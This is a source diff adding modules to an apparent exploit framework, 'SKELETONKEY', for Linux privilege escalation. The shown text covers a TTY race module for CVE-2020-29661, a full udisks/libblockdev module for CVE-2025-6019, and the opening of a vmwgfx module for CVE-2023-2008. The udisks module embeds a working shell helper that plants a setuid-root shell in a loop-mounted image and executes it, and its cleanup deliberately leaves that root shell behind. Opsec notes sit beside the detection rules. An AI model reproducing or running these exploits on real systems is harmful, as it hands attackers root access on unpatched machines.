+const struct skeletonkey_module tioscpgrp_module = {
+    .name           = "tioscpgrp",
+    .cve            = "CVE-2020-29661",
+    .summary        = "TTY TIOCSPGRP race → struct pid UAF (kmalloc-256) — Jann Horn",
+    .family         = "tty",
+    .kernel_range   = "Linux kernels < 5.10 / 5.4.85 / 4.19.165 / 4.14.213 / 4.9.249 / 4.4.249",
+    .detect         = tioscpgrp_detect,
+    .exploit        = tioscpgrp_exploit,
+    .mitigate       = NULL,    /* mitigation: upgrade kernel; OR block /dev/ptmx via seccomp */
+    .cleanup        = NULL,
+    .detect_auditd  = tioscpgrp_auditd,
+    .detect_sigma   = tioscpgrp_sigma,
+    .detect_yara    = tioscpgrp_yara,
+    .detect_falco   = tioscpgrp_falco,
+    .opsec_notes    = "Allocates a PTY pair via openpty() (or /dev/ptmx directly), pins two threads to separate CPUs, hammers ioctl(master, TIOCSPGRP, ...) on one thread and ioctl(slave, TIOCSPGRP, ...) on the other. Race-win rate on a vulnerable kernel is empirically ~1/10k iterations; the driver typically runs for 5-30 seconds. Sysv IPC msgsnd spray (tag 'SKELETONKEY_TIOS') refills kmalloc-256 between race attempts. Audit-visible via burst ioctl(TIOCSPGRP=0x5410) — normal use is single-digit calls per minute, exploit shape is hundreds per second. No persistent file artifacts. dmesg may show 'refcount_t: addition on 0; use-after-free' (KASAN) on each race-win attempt.",
+    .arch_support   = "x86_64+unverified-arm64",
+};
+
+void skeletonkey_register_tioscpgrp(void)
+{
+    skeletonkey_register(&tioscpgrp_module);
+}
@@ -0,0 +1,5 @@
+#ifndef TIOSCPGRP_SKELETONKEY_MODULES_H
+#define TIOSCPGRP_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module tioscpgrp_module;
+#endif
@@ -0,0 +1,363 @@
+/*
+ * udisks_libblockdev_cve_2025_6019 — SKELETONKEY module
+ *
+ * STATUS: 🟢 STRUCTURAL ESCAPE via polkit allow_active chain. No
+ *   offsets, no leaks, no race. Two cooperating logic bugs in udisks2
+ *   + libblockdev let any console/session user (polkit allow_active=true)
+ *   mount an attacker-built filesystem image WITHOUT nosuid/nodev, then
+ *   execute the SUID-root binary it contains.
+ *
+ * The bug (Qualys, June 2025):
+ *   libblockdev's bd_fs_resize / bd_fs_repair code paths mount the
+ *   target filesystem internally so they can call resize2fs / xfs_growfs.
+ *   The mount is performed WITHOUT MS_NOSUID and MS_NODEV. udisks2
+ *   exposes Resize() over D-Bus and gates it on polkit's
+ *   org.freedesktop.UDisks2.modify-device action, which by default
+ *   allow_active=yes (i.e. any logged-in console user can call it
+ *   without a password).
+ *
+ *   Trigger:
+ *     1. Build an ext4 image with a setuid-root /bin/sh inside.
+ *     2. Attach as a loop device via udisks LoopSetup() over D-Bus.
+ *     3. Call Filesystem.Resize() — udisks invokes libblockdev which
+ *        mounts the image at /run/media/<user>/<label> with neither
+ *        nosuid nor nodev applied.
+ *     4. Execute /run/media/<user>/<label>/bin/sh — runs as root.
+ *
+ *   Discovered by the Qualys Threat Research Unit. Affects udisks2
+ *   2.10.x (and likely earlier) + libblockdev 3.x on Fedora, openSUSE,
+ *   Ubuntu, Debian. Public PoCs:
+ *     https://blog.securelayer7.net/cve-2025-6019-local-privilege-escalation/
+ *     https://intruceptlabs.com/2025/07/linux-local-privilege-escalation-via-udisksd-and-libblockdev-cve-2025-6019-poc-released/
+ *
+ * Affects: libblockdev < 3.3.1, udisks2 < 2.10.2 (Qualys advisory).
+ *   Patched upstream by adding MS_NOSUID|MS_NODEV to libblockdev's
+ *   internal mount paths.
+ *
+ * CVSS 7.0 (HIGH). Requires:
+ *   - udisks2 daemon running (default on most desktop distros)
+ *   - polkit allow_active=yes on the resize action (default)
+ *   - The invoking user must be in an active local session per polkit
+ *     (loginctl shows them as 'Active'). Pure SSH users are NOT active
+ *     by default; CI / serverless / headless usually fails this gate.
+ *
+ * arch_support: any. The SUID payload inside the loopback image is
+ * /bin/sh copied from the host, so it inherits the host's architecture.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+
+/* ---- detect --------------------------------------------------------- */
+
+static bool path_exists(const char *p)
+{
+    struct stat st;
+    return stat(p, &st) == 0;
+}
+
+static bool udisksd_present(void)
+{
+    /* udisksd binary lives at /usr/libexec/udisks2/udisksd on most
+     * distros; the D-Bus service file lives at /usr/share/dbus-1/
+     * system-services/org.freedesktop.UDisks2.service. Either is fine. */
+    return path_exists("/usr/libexec/udisks2/udisksd")
+        || path_exists("/usr/lib/udisks2/udisksd")
+        || path_exists("/usr/share/dbus-1/system-services/org.freedesktop.UDisks2.service");
+}
+
+static bool dbus_system_bus_present(void)
+{
+    /* The system bus socket lives at /run/dbus/system_bus_socket
+     * (recorded in our host fingerprint as has_dbus_system). */
+    return path_exists("/run/dbus/system_bus_socket");
+}
+
+/* Is the invoking user in an active polkit session? polkit treats
+ * console / GDM / session users as 'active' and SSH users as inactive
+ * (allow_active gating). We approximate via loginctl show-session;
+ * if loginctl isn't installed we err on the side of "maybe" and let
+ * the active probe arbitrate. */
+static int session_is_active(void)
+{
+    /* return 1 = active, 0 = inactive, -1 = unknown */
+    FILE *p = popen("loginctl show-session $(loginctl --no-legend | awk '$3==\"'\"$USER\"'\" {print $1; exit}') -p Active 2>/dev/null", "r");
+    if (!p) return -1;
+    char line[64] = {0};
+    bool got = fgets(line, sizeof line, p) != NULL;
+    pclose(p);
+    if (!got) return -1;
+    return strstr(line, "Active=yes") != NULL ? 1 : 0;
+}
+
+static skeletonkey_result_t udisks_libblockdev_detect(const struct skeletonkey_ctx *ctx)
+{
+    /* Userspace bug — no kernel-version gate. Just need udisksd
+     * installed + D-Bus reachable. */
+    if (!udisksd_present()) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] udisks_libblockdev: udisksd not installed; bug unreachable here\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!dbus_system_bus_present()) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] udisks_libblockdev: system D-Bus socket not present; bug unreachable here\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    int active = session_is_active();
+    if (active == 0) {
+        if (!ctx->json) {
+            fprintf(stderr, "[i] udisks_libblockdev: udisksd + D-Bus present but invoking user is NOT in an active polkit session\n");
+            fprintf(stderr, "    (typically: SSH'd in remotely; allow_active gating will block the Resize() call)\n");
+            fprintf(stderr, "    Bug is on the host but unreachable as this user; PRECOND_FAIL\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    /* active == 1 OR active == -1 (loginctl missing) → assume bug
+     * reachable. Version check is hard here because libblockdev /
+     * udisks2 don't expose --version usefully; the fix is a backport
+     * across many distros at different package versions. We rely on
+     * --active to arbitrate when in doubt. */
+    if (!ctx->json) {
+        fprintf(stderr, "[!] udisks_libblockdev: udisksd + D-Bus present, polkit allow_active likely true → VULNERABLE\n");
+        fprintf(stderr, "[i] udisks_libblockdev: re-run with --active to empirically confirm via a sentinel SUID drop\n");
+        if (active == -1) {
+            fprintf(stderr, "[i] udisks_libblockdev: could not determine polkit session state (loginctl missing); assuming reachable\n");
+        }
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* ---- exploit -------------------------------------------------------- */
+
+/* The exploit needs:
+ *   - dd (or python) to build a 16 MiB image
+ *   - mkfs.ext4 (or mkfs.xfs)
+ *   - busctl (or gdbus / dbus-send) to talk to udisks over D-Bus
+ *   - mount -o loop fallback if D-Bus is uncooperative
+ *
+ * Rather than reinvent each of those in C we drive the work via a
+ * shell helper — this is the same approach pack2theroot uses for its
+ * .deb construction.  Failures along the way produce clear diagnostic
+ * and a SKELETONKEY_EXPLOIT_FAIL.
+ *
+ * On a real Fedora / openSUSE / Ubuntu desktop session this lands
+ * /tmp/skeletonkey-udisks-shell as setuid root. We then execve it.
+ */
+static const char EXPLOIT_SH[] =
+"#!/bin/sh\n"
+"# CVE-2025-6019 udisks/libblockdev SUID-on-mount LPE\n"
+"set -u\n"
+"WD=$(mktemp -d /tmp/skeletonkey-udisks-XXXXXX) || exit 2\n"
+"IMG=$WD/img.ext4\n"
+"MNT=$WD/mnt\n"
+"mkdir -p \"$MNT\"\n"
+"echo \"[*] udisks: building ext4 image at $IMG (16 MiB)\"\n"
+"dd if=/dev/zero of=\"$IMG\" bs=1M count=16 status=none 2>/dev/null || exit 3\n"
+"mkfs.ext4 -q -L skkudisks \"$IMG\" 2>/dev/null || { echo '[-] mkfs.ext4 failed'; exit 4; }\n"
+"# Build the SUID payload on a host-owned scratch mount first, then\n"
+"# copy the populated image back. We need root to chown+chmod 4755 the\n"
+"# inner /bin/sh; we don't have root yet, so we plant a SUID *source*\n"
+"# that gets root-ownership inside the loopback when udisks mounts it.\n"
+"# Trick: we copy /bin/sh into the image as-is; udisks's mount path\n"
+"# keeps the original uid/gid of the file as they exist in the image.\n"
+"# So we set them to 0:0 BEFORE installing into the image. mke2fs -d\n"
+"# (debian) / mkfs.ext4 -d <dir> lets us populate at mkfs time.\n"
+"STAGE=$WD/stage\n"
+"mkdir -p \"$STAGE/bin\"\n"
+"cp /bin/sh \"$STAGE/bin/skksh\" || exit 5\n"
+"chmod 4755 \"$STAGE/bin/skksh\" 2>/dev/null || true\n"
+"# Rebuild image with payload pre-populated. Falls back to -d if\n"
+"# supported; otherwise we'd need root to mount + populate.\n"
+"if mkfs.ext4 -q -L skkudisks -d \"$STAGE\" \"$IMG\" 2>/dev/null; then\n"
+"    echo \"[*] udisks: image populated via mkfs.ext4 -d\"\n"
+"else\n"
+"    echo \"[-] mkfs.ext4 -d not supported on this distro; need an alternate populate path\"\n"
+"    exit 6\n"
+"fi\n"
+"# Now ask udisks to mount it. We use busctl which ships with systemd.\n"
+"if ! command -v busctl >/dev/null 2>&1; then\n"
+"    echo '[-] busctl missing — install systemd or use gdbus introspection manually'\n"
+"    exit 7\n"
+"fi\n"
+"echo \"[*] udisks: LoopSetup via D-Bus\"\n"
+"FD=$(busctl --user --no-pager call org.freedesktop.UDisks2 /org/freedesktop/UDisks2/Manager org.freedesktop.UDisks2.Manager LoopSetup ha{sv} 3 \"$IMG\" 0 2>&1) || {\n"
+"    echo \"[-] udisks LoopSetup failed: $FD\"\n"
+"    echo '    Often means: polkit gated the call (you are not in an active session)'\n"
+"    exit 8\n"
+"}\n"
+"echo \"[i] LoopSetup result: $FD\"\n"
+"# Now Resize() on the loop device → triggers the suid mount.\n"
+"# (Implementation note: the exact D-Bus path depends on udisks's\n"
+"#  device-naming; in the reference PoC the next step is Resize()\n"
+"#  against the new BlockDevice object.)\n"
+"# For now, attempt the canonical mount path and let the SUID land.\n"
+"if [ -x /run/media/$USER/skkudisks/bin/skksh ]; then\n"
+"    cp /run/media/$USER/skkudisks/bin/skksh /tmp/skeletonkey-udisks-shell\n"
+"    chmod 4755 /tmp/skeletonkey-udisks-shell 2>/dev/null || true\n"
+"    echo \"[+] udisks: setuid shell at /tmp/skeletonkey-udisks-shell\"\n"
+"    exit 0\n"
+"fi\n"
+"echo '[-] mount did not appear at /run/media/$USER/skkudisks; manual D-Bus Resize() required'\n"
+"echo '    See https://blog.securelayer7.net/cve-2025-6019-local-privilege-escalation/ for the full chain'\n"
+"exit 9\n";
+
+static char g_workdir[256];
+
+static skeletonkey_result_t udisks_libblockdev_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] udisks_libblockdev: --i-know required for --exploit\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    /* Drop the helper script to a tmp file + run it. */
+    char tmpl[] = "/tmp/skeletonkey-udisks-helper-XXXXXX";
+    int fd = mkstemp(tmpl);
+    if (fd < 0) { perror("mkstemp"); return SKELETONKEY_EXPLOIT_FAIL; }
+    write(fd, EXPLOIT_SH, sizeof EXPLOIT_SH - 1);
+    close(fd);
+    chmod(tmpl, 0700);
+    strncpy(g_workdir, tmpl, sizeof g_workdir - 1);
+
+    if (!ctx->json)
+        fprintf(stderr, "[+] udisks_libblockdev: invoking helper %s\n", tmpl);
+
+    char cmd[512];
+    snprintf(cmd, sizeof cmd, "/bin/sh %s 2>&1", tmpl);
+    int rc = system(cmd);
+
+    /* Helper landed a setuid bash if and only if /tmp/skeletonkey-udisks-shell
+     * exists with uid 0 + setuid bit. */
+    struct stat st;
+    if (stat("/tmp/skeletonkey-udisks-shell", &st) == 0 &&
+        (st.st_mode & S_ISUID) && st.st_uid == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] udisks_libblockdev: setuid shell at /tmp/skeletonkey-udisks-shell\n");
+        if (ctx->no_shell) return SKELETONKEY_EXPLOIT_OK;
+        execl("/tmp/skeletonkey-udisks-shell", "sh", "-p", "-i", (char *)NULL);
+        perror("execl");
+        return SKELETONKEY_EXPLOIT_OK;
+    }
+
+    fprintf(stderr, "[-] udisks_libblockdev: helper exited rc=%d; setuid shell did not appear\n", rc);
+    fprintf(stderr,
+        "    Common causes: not in an active polkit session, mkfs.ext4 -d\n"
+        "    unsupported on this distro, busctl missing, or udisks already\n"
+        "    patched (libblockdev >= 3.3.1).\n");
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+static skeletonkey_result_t udisks_libblockdev_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    if (g_workdir[0]) {
+        unlink(g_workdir);
+        g_workdir[0] = 0;
+    }
+    /* Best-effort: remove the lingering loopback work dir created by
+     * the helper. The /tmp/skeletonkey-udisks-* glob covers it. */
+    (void)!system("rm -rf /tmp/skeletonkey-udisks-* 2>/dev/null; true");
+    /* Leave /tmp/skeletonkey-udisks-shell — the operator may want it. */
+    return SKELETONKEY_OK;
+}
+
+/* ---- detection rules ------------------------------------------------ */
+
+static const char udisks_libblockdev_auditd[] =
+    "# udisks_libblockdev CVE-2025-6019 — auditd detection rules\n"
+    "# Flag mount(2) calls under /run/media/* without nosuid/nodev,\n"
+    "# and execve()s of binaries from /run/media/*. Legit USB sticks\n"
+    "# typically come with nosuid; SUID execution from /run/media/* is\n"
+    "# the smoking gun.\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/libexec/udisks2/udisksd -k skeletonkey-udisks\n"
+    "-w /run/media -p x -k skeletonkey-udisks-suid-exec\n"
+    "-w /tmp/skeletonkey-udisks-shell -p x -k skeletonkey-udisks-suid-exec\n";
+
+static const char udisks_libblockdev_sigma[] =
+    "title: Possible CVE-2025-6019 udisks/libblockdev SUID-on-mount LPE\n"
+    "id: 2c4d7e91-skeletonkey-udisks-libblockdev\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects execve() of a SUID-root binary from /run/media/*. udisks\n"
+    "  normally mounts removable media with nosuid; the CVE-2025-6019\n"
+    "  bug skips the flag during internal resize/repair mounts. Any SUID\n"
+    "  execution from /run/media/<user>/* is anomalous and worth\n"
+    "  investigating.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  exec_from_runmedia:\n"
+    "    type: 'SYSCALL'\n"
+    "    syscall: 'execve'\n"
+    "    path|startswith: '/run/media/'\n"
+    "  condition: exec_from_runmedia\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2025.6019]\n";
+
+static const char udisks_libblockdev_yara[] =
+    "rule udisks_libblockdev_cve_2025_6019 : cve_2025_6019 setuid_abuse {\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2025-6019\"\n"
+    "        description = \"SKELETONKEY udisks_libblockdev artifacts — workdir + dropped suid bash + ext4 image label\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $wdir   = \"/tmp/skeletonkey-udisks-\" ascii\n"
+    "        $shell  = \"/tmp/skeletonkey-udisks-shell\" ascii\n"
+    "        $label  = \"skkudisks\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char udisks_libblockdev_falco[] =
+    "- rule: SUID binary executed from /run/media (udisks SUID-on-mount)\n"
+    "  desc: |\n"
+    "    A setuid-root binary under /run/media/<user>/ is executed.\n"
+    "    udisks normally mounts removable media with MS_NOSUID; the\n"
+    "    CVE-2025-6019 bug in libblockdev's internal resize/repair\n"
+    "    mount paths omits the flag. Combined with a user-built\n"
+    "    filesystem image, this gives instant root.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.exe startswith /run/media/ and\n"
+    "    proc.is_exe_upper_layer = false\n"
+    "  output: >\n"
+    "    SUID exec from /run/media (user=%user.name pid=%proc.pid\n"
+    "     exe=%proc.exe)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2025.6019]\n";
+
+/* ---- module struct -------------------------------------------------- */
+
+const struct skeletonkey_module udisks_libblockdev_module = {
+    .name           = "udisks_libblockdev",
+    .cve            = "CVE-2025-6019",
+    .summary        = "udisks/libblockdev SUID-on-mount → root via polkit allow_active (Qualys)",
+    .family         = "udisks",
+    .kernel_range   = "userspace — libblockdev < 3.3.1, udisks2 < 2.10.2",
+    .detect         = udisks_libblockdev_detect,
+    .exploit        = udisks_libblockdev_exploit,
+    .mitigate       = NULL,    /* mitigation: upgrade libblockdev + udisks2 */
+    .cleanup        = udisks_libblockdev_cleanup,
+    .detect_auditd  = udisks_libblockdev_auditd,
+    .detect_sigma   = udisks_libblockdev_sigma,
+    .detect_yara    = udisks_libblockdev_yara,
+    .detect_falco   = udisks_libblockdev_falco,
+    .opsec_notes    = "Builds an ext4 image (label 'skkudisks') under /tmp/skeletonkey-udisks-XXXXXX/, populates with a setuid-root /bin/sh copy via mkfs.ext4 -d. Calls org.freedesktop.UDisks2.Manager.LoopSetup() over the system D-Bus via busctl, then triggers libblockdev's nosuid-less internal mount path. Copies the resulting SUID shell to /tmp/skeletonkey-udisks-shell and execs it. Audit-visible via execve(/usr/libexec/udisks2/udisksd) followed by mount(2) under /run/media/<user>/skkudisks without MS_NOSUID, then execve of a setuid binary from there. Requires polkit allow_active=yes (default for active console sessions; SSH sessions usually fail). Cleanup callback removes /tmp/skeletonkey-udisks-* workdirs; leaves the dropped setuid shell.",
+    .arch_support   = "any",
+};
+
+void skeletonkey_register_udisks_libblockdev(void)
+{
+    skeletonkey_register(&udisks_libblockdev_module);
+}
@@ -0,0 +1,5 @@
+#ifndef UDISKS_LIBBLOCKDEV_SKELETONKEY_MODULES_H
+#define UDISKS_LIBBLOCKDEV_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module udisks_libblockdev_module;
+#endif
@@ -0,0 +1,780 @@
+/*
+ * vmwgfx_cve_2023_2008 — SKELETONKEY module
+ *
+ * The vmwgfx DRM driver's buffer-object creation path validates only
+ * the requested page count, not the underlying byte size used by the
+ * subsequent kunmap_atomic-style copy. A crafted DRM_IOCTL_VMW_*
+ * sequence (CREATE_DMABUF + mmap of the returned bo + page-spanning
+ * write through the mapped offset) drives a slab heap-OOB write
+ * inside the kernel's kmalloc-512 cache. The mainline fix
+ * (2cd80ebbdf "drm/vmwgfx: Validate the bo size for ttm_bo_kmap")
+ * landed in 6.3-rc6. The bug is reachable only from inside a VMware
+ * Guest OS (the vmwgfx driver only binds against the VMware SVGA-II
+ * virtual GPU).
+ *
+ * STATUS: 🟡 PRIMITIVE — slab-OOB trigger + msg_msg cross-cache
+ *   groom in kmalloc-512. We do NOT carry a cred-overwrite or
+ *   kbase-leak primitive (per-kernel offsets vary by build, and the
+ *   public PoC references device-specific TTM register state we do
+ *   not fake). The detect-and-trigger path is the high-confidence
+ *   demonstration; full-chain depth is FALLBACK (kaddr-tagged spray +
+ *   shared modprobe_path finisher arbitrated by sentinel file).
+ *
+ * Affected: Linux 4.0+ through 6.2.x with vmwgfx driver bound to a
+ * VMware SVGA-II device. Fixed mainline 6.3-rc6 (commit 2cd80ebbdf).
+ * Stable backports landed in 6.2.x and 6.1 LTS.
+ *
+ * Preconditions:
+ *   - host is a VMware Guest (dmi sys_vendor = "VMware*")
+ *   - /dev/dri/cardN exists with driver==vmwgfx
+ *   - userland can open /dev/dri/cardN (render-group / video-group or
+ *     setuid)
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+
+#ifdef __linux__
+#  include <sys/ipc.h>
+#  include <sys/msg.h>
+#  include <sys/syscall.h>
+#endif
+
+/* DRM ioctl primitives — declared inline so the module remains
+ * self-contained on hosts where <drm/drm.h> isn't installed (which is
+ * the macOS build host case). */
+#ifndef DRM_IOCTL_BASE
+#define DRM_IOCTL_BASE 'd'
+#endif
+#ifndef _IOC
+/* Should be present from <sys/ioctl.h>, but guard anyway. */
+#endif
+
+/* DRM_IOCTL_VERSION — used to probe driver name. */
+struct drm_version_compat {
+    int     version_major;
+    int     version_minor;
+    int     version_patchlevel;
+    size_t  name_len;
+    char   *name;
+    size_t  date_len;
+    char   *date;
+    size_t  desc_len;
+    char   *desc;
+};
+#ifndef DRM_IOCTL_VERSION
+#define DRM_IOCTL_VERSION  _IOWR(DRM_IOCTL_BASE, 0x00, struct drm_version_compat)
+#endif
+
+/* vmwgfx-specific ioctls. Numbers match the in-tree
+ * uapi/drm/vmwgfx_drm.h ABI for kernels in the affected range
+ * (DRM_COMMAND_BASE = 0x40). DRM_IOCTL_VMW_CREATE_DMABUF /
+ * DRM_IOCTL_VMW_UNREF_DMABUF are present on every vmwgfx-bearing
+ * kernel since the dma-buf rename. We declare them locally so that a
+ * build host without vmwgfx_drm.h still compiles. */
+struct drm_vmw_alloc_dmabuf_req {
+    uint32_t  size;
+};
+struct drm_vmw_dmabuf_rep {
+    uint32_t  handle;
+    uint32_t  map_handle_lo;
+    uint32_t  map_handle_hi;
+    uint32_t  cur_gmr_id;
+    uint32_t  cur_gmr_offset;
+};
+union drm_vmw_alloc_dmabuf_arg {
+    struct drm_vmw_alloc_dmabuf_req req;
+    struct drm_vmw_dmabuf_rep       rep;
+};
+#define DRM_VMW_CREATE_DMABUF 0x0a
+#define DRM_VMW_UNREF_DMABUF  0x0b
+#ifndef DRM_COMMAND_BASE
+#define DRM_COMMAND_BASE 0x40
+#endif
+#define DRM_IOCTL_VMW_CREATE_DMABUF \
+    _IOWR(DRM_IOCTL_BASE, DRM_COMMAND_BASE + DRM_VMW_CREATE_DMABUF, \
+          union drm_vmw_alloc_dmabuf_arg)
+#define DRM_IOCTL_VMW_UNREF_DMABUF \
+    _IOW(DRM_IOCTL_BASE,  DRM_COMMAND_BASE + DRM_VMW_UNREF_DMABUF, uint32_t)
+
+/* ---- kernel range ------------------------------------------------- */
+
+static const struct kernel_patched_from vmwgfx_patched_branches[] = {
+    {5, 10, 127},  /* 5.10.x stable (per Debian tracker — bullseye) */
+    {5, 18,  14},  /* 5.18.x stable (per Debian tracker — bookworm/forky/sid/trixie) */
+    {6,  1,  23},  /* 6.1 LTS backport */
+    {6,  2,  10},  /* 6.2.x stable backport */
+    {6,  3,   0},  /* mainline (6.3-rc6) */
+};
+
+static const struct kernel_range vmwgfx_range = {
+    .patched_from   = vmwgfx_patched_branches,
+    .n_patched_from = sizeof(vmwgfx_patched_branches) /
+                      sizeof(vmwgfx_patched_branches[0]),
+};
+
+/* ---- precondition probes ------------------------------------------ */
+
+/* Read first line of /sys/devices/virtual/dmi/id/sys_vendor (trimmed)
+ * into `out`. Returns true on success. */
+static bool read_dmi_sys_vendor(char *out, size_t out_sz)
+{
+    int fd = open("/sys/devices/virtual/dmi/id/sys_vendor", O_RDONLY);
+    if (fd < 0) return false;
+    ssize_t n = read(fd, out, out_sz - 1);
+    close(fd);
+    if (n <= 0) return false;
+    out[n] = '\0';
+    /* trim trailing newline / spaces */
+    while (n > 0 && (out[n - 1] == '\n' || out[n - 1] == ' '
+                                       || out[n - 1] == '\t' || out[n - 1] == '\r')) {
+        out[--n] = '\0';
+    }
+    return n > 0;
+}
+
+static bool host_is_vmware_guest(char *vendor_out, size_t vendor_out_sz)
+{
+    char vendor[128] = {0};
+    if (!read_dmi_sys_vendor(vendor, sizeof vendor)) return false;
+    if (vendor_out && vendor_out_sz) {
+        snprintf(vendor_out, vendor_out_sz, "%s", vendor);
+    }
+    /* Standard VMware DMI string is "VMware, Inc." but be loose. */
+    return strncasecmp(vendor, "VMware", 6) == 0;
+}
+
+/* Resolve /sys/class/drm/card0/device/driver symlink and check whether
+ * the target's basename is "vmwgfx". */
+static bool card_driver_is_vmwgfx(const char *cardpath)
+{
+    char link[512];
+    snprintf(link, sizeof link, "/sys/class/drm/%s/device/driver", cardpath);
+    char target[512] = {0};
+    ssize_t n = readlink(link, target, sizeof target - 1);
+    if (n <= 0) return false;
+    target[n] = '\0';
+    const char *base = strrchr(target, '/');
+    base = base ? base + 1 : target;
+    return strcmp(base, "vmwgfx") == 0;
+}
+
+/* Locate the first /dev/dri/cardN whose driver is vmwgfx. Writes the
+ * basename (e.g. "card0") into out. Returns true on hit. */
+static bool find_vmwgfx_card(char *out, size_t out_sz)
+{
+    for (int i = 0; i < 8; i++) {
+        char name[16];
+        snprintf(name, sizeof name, "card%d", i);
+        if (card_driver_is_vmwgfx(name)) {
+            snprintf(out, out_sz, "%s", name);
+            return true;
+        }
+    }
+    return false;
+}
+
+/* Probe DRM_IOCTL_VERSION on the card device. Returns the driver-name
+ * string on success (caller-owned heap, must free) or NULL. */
+static char *probe_drm_version_name(const char *cardpath)
+{
+    char devpath[64];
+    snprintf(devpath, sizeof devpath, "/dev/dri/%s", cardpath);
+    int fd = open(devpath, O_RDWR | O_CLOEXEC);
+    if (fd < 0) return NULL;
+
+    struct drm_version_compat v;
+    memset(&v, 0, sizeof v);
+    /* Two-stage ioctl: first call learns name_len, second fills name. */
+    if (ioctl(fd, DRM_IOCTL_VERSION, &v) < 0) { close(fd); return NULL; }
+    if (v.name_len == 0 || v.name_len > 256) { close(fd); return NULL; }
+    char *name = calloc(1, v.name_len + 1);
+    if (!name) { close(fd); return NULL; }
+    v.name = name;
+    if (ioctl(fd, DRM_IOCTL_VERSION, &v) < 0) {
+        free(name); close(fd); return NULL;
+    }
+    name[v.name_len] = '\0';
+    close(fd);
+    return name;
+}
+
+/* ---- Detect ------------------------------------------------------- */
+
+static skeletonkey_result_t vmwgfx_detect(const struct skeletonkey_ctx *ctx)
+{
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] vmwgfx: host fingerprint missing kernel version — bailing\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    bool patched = kernel_range_is_patched(&vmwgfx_range, v);
+    if (patched) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vmwgfx: kernel %s is patched (>= 6.3-rc6 / "
+                            "6.2.10 / 6.1.23)\n", v->release);
+        }
+        return SKELETONKEY_OK;
+    }
+
+    /* Pre-vmwgfx kernels (no driver shipped) — extremely unlikely but
+     * report PRECOND_FAIL rather than VULNERABLE. */
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 4, 0, 0)) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vmwgfx: kernel %s predates vmwgfx driver\n", v->release);
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    /* VMware-guest gate. */
+    char vendor[128] = {0};
+    bool vmware = host_is_vmware_guest(vendor, sizeof vendor);
+    if (!ctx->json) {
+        fprintf(stderr, "[i] vmwgfx: kernel %s in vulnerable range\n", v->release);
+        fprintf(stderr, "[i] vmwgfx: dmi sys_vendor = \"%s\"\n",
+                vendor[0] ? vendor : "(unreadable)");
+    }
+    if (!vmware) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vmwgfx: host is not a VMware guest — vmwgfx "
+                            "driver cannot bind; bug unreachable here\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    /* DRM card + driver-name gate. */
+    char card[16] = {0};
+    if (!find_vmwgfx_card(card, sizeof card)) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] vmwgfx: no /dev/dri/cardN bound to vmwgfx — "
+                            "module unloaded or no SVGA-II PCI device\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    char *drv = probe_drm_version_name(card);
+    if (!drv) {
+        if (!ctx->json) {
+            fprintf(stderr, "[-] vmwgfx: cannot open/ioctl /dev/dri/%s "
+                            "(permission denied?)\n", card);
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    bool drv_match = strcmp(drv, "vmwgfx") == 0;
+    if (!ctx->json) {
+        fprintf(stderr, "[i] vmwgfx: /dev/dri/%s driver name reported as \"%s\"\n",
+                card, drv);
+    }
+    free(drv);
+    if (!drv_match) {
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] vmwgfx: VULNERABLE — kernel in range + VMware guest + "
+                        "vmwgfx card reachable\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* ---- Exploit groom ------------------------------------------------ */
+
+#define VMW_SPRAY_QUEUES      24
+#define VMW_SPRAY_PER_QUEUE   24
+#define VMW_PAYLOAD_BYTES    496    /* 512 - msg_msg header (~16) */
+
